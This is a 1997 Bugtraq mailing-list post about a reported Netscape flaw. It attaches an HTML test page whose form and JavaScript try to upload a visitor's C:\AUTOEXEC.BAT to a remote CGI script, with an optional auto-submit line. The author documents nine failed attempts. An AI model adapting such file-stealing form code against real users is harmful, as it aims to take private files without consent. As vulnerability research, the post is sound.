Bugtraq mailing list archives

Re: Netscape Exploit

From: robin.hood () IBM NET (Edwin Li-Kai Liu)
Date: Sun, 15 Jun 1997 17:52:26 +0700


This is a multi-part message in MIME format.
--------------D3FEBF5D9B509829435FAEDA
Content-Type: text/plain; charset=iso-8859-1
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Content-Transfer-Encoding: 8bit

Please "view" the html source to check if it hurts before viewing this
page. I have written anything I want to say in this document.

--

Robin Hood
------------------------------------
Dreaming of a butterfly, fly into the sky.
¹Ú·QÅÜ¦¨½¹½º¡A¸¤W¤ÑªÅ¡C


--------------D3FEBF5D9B509829435FAEDA
Content-Type: text/html; charset=us-ascii; name="eviljava.html"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline; filename="eviljava.html"
Content-Base: "file:///C|/Download/eviljava.html"


<HTML>
<HEAD>
    <TITLE>Netscape Bug Test</TITLE>
</HEAD>

<BODY>

<FORM NAME="foo"
    ENCTYPE="multipart/form-data"
    ACTION="http://acm.cs.umr.edu/~jferg/cgi-bin/print.pl";
    METHOD=POST>

<INPUT TYPE=HIDDEN NAME=USELESS VALUE="Just to force having a property">

<SCRIPT language=javascript>
// During this stage, the form is still under construction. The purpose of this block
// is just used to generate the form.

    // document.write("<INPUT TYPE=FILE NAME=SIMPLE VALUE=\"C:\\AUTOEXEC.BAT\">");

    // document.write("<INPUT TYPE=HIDDEN NAME=SIMPLE VALUE=\"C:\\AUTOEXEC.BAT\">");

    document.write("<INPUT TYPE=FILE NAME=SIMPLE VALUE=\"C:\\AUTOEXEC.BAT\"");
    document.write("    FILENAME=\"C:\\AUTOEXEC.BAT\">");

</SCRIPT>

<BR><INPUT TYPE=SUBMIT VALUE="Just press here">&nbsp&nbsp&nbsp
<INPUT TYPE=RESET VALUE="Reset everything">
</FORM>

<SCRIPT langauge=javascript>
// The form should be done during this stage. So we can manipulate the form data here.

    // document.foo.SIMPLE.open("C:\\AUTOEXEC.BAT");
    document.foo.SIMPLE.value = "C:\\AUTOEXEC.BAT";

    document.foo.SIMPLE.filename = "C:\\AUTOEXEC.BAT";

    // document.foo.SIMPLE.type="FILE";

    // unmark the following line for auto-submit.
    // document.foo.submit();
</SCRIPT>

<H2>The Netscpae Bug Test Page</H2>
<H4>The following is how I have tried, in order to show my
responsibility to my postings on the mail-list</H4>

<I>Failure History:</I></P>

  1. Generate the Input Type tag by JavaScript document.write function. I
     hope the bug is due to the lack of check in document.write. Reason of
     failure: document.write treats the code as usual.
  2. Assign a value by JavaScript. Reason of failure: Value ignored.
  3. Try to assign a default value to Input Type, then Reset to force to set
     again. Reason of failure: No effects.
  4. Try to assign a default value to a different type, then force the input
     type to change to FILE. Reason of failure: TYPE is READONLY.
  5. Try OPEN property of input type/file. Reason of failure: open is not a
     function.
  6. Try to have more than one element named SIMPLE in order to try to
     confuse Netscape. Then try to set the form value of SIMPLE. Reason of
     failure: Netscape not confused.
  7. Try to assign a value to a textbox and paste it to the textbox provided
     by InputType/File. Reason of failure: no such function to do that.
  8. Try to replace the VALUE attribute to FILENAME in SIMPLE. (Please look
     at the result produced by the CGI program. Reason of failure: doesn't
     work.
  9. Multiple SIMPLE File Inputs all placed after SIMPLE Hidden Input.
     Reason of failure: Cannot even set up the file name manually.




I still believe that the way that allows the server to get the file contents but
requires the knowledge of the exact path name and file name, is to use the INPUT
TYPE/File method. However, there seemed very difficult to force assigning a file to
that form element. Therefore, in my hypothesis, there should be a bug that will let
a JavaScript program to set the value for a secured form element.</P>


The possible way to research might be: JavaScript and Security; Form Data
Manipulation; or related topics about JavaScript. However, it is not necessary to
stick with Client Side JavaScript. I am not sure about the impossibility to use a
server side JavaScript to accomplish this. Maybe the problem is due to JavaApplet
not JavaScript. The best way, but the most difficult way is to debug the Netscape
program in order to clarify this.</P>


I think this is definitely out of our topic to search for a bug for Netscape,
that originally we just want to "guess" how the bug works for hacking. Well, if
someone really want the one thousand US dollars reward and a T-shirt, that person
may continue to do so. I will not research for this anymore. But if you do find the
bug, I wish that you can give me the T-shirt. :-)</P>


If you have any questions, it is welcome to e-mail to
robin.hood () ibm net. I will be glad to take
your comments. Special thanks to Justin C. Ferguson, who provides the server side
cgi-bin program that eases my testings.</P>

</BODY>
</HTML>


--------------D3FEBF5D9B509829435FAEDA--

Current thread:

Re: Netscape Exploit Justin C. Ferguson (Jun 14)
- SunOS 4.1.4 ftp serious bug Homer W. Smith (Jun 15)
  - Re: SunOS 4.1.4 ftp serious bug Francesco Messineo (Jun 16)
  - Re: SunOS 4.1.4 ftp serious bug Joe Zbiciak (Jun 16)
- <Possible follow-ups>
- Re: Netscape Exploit Edwin Li-Kai Liu (Jun 15)
  - Re: Netscape Exploit John Robert LoVerso (Jun 16)
- Re: Netscape Exploit Sevo Stille (Jun 15)